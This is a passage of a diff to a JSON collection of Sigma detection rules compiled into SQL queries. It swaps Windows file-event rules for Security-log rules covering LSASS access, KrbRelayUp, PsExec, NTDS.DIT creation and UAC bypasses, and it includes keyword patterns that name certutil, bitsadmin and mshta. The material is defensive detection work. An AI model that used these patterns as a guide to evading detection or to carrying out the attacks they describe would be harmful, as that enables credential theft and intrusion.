'%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" - ], + "title": "Locked Workstation", + "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "status": "stable", + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_workstation_was_locked.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "title": "Failed Code Integrity Checks", + "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "status": "stable", + "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027.001" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Disk device errors" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_codeintegrity_check_failure.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Admin User Remote Logon", + "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "status": "test", + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "author": "juju4", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Legitimate administrative activity." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_admin_rdp_login.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ @@ -39375,1280 +39406,1325 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "Dynamic CSharp Compile Artefact", - "id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", - "status": "test", - "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", - "author": "frack113", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.cmdline' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_csharp_compile_artefact.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", - "status": "experimental", - "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_svcctl_remote_service.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Users creating a shortcut on e.g. desktop" + "Administrator activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.001" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" - ], - "filename": "file_event_win_crackmapexec_patterns.yml" - }, - { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", - "tags": [ - "attack.t1036.005", - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - 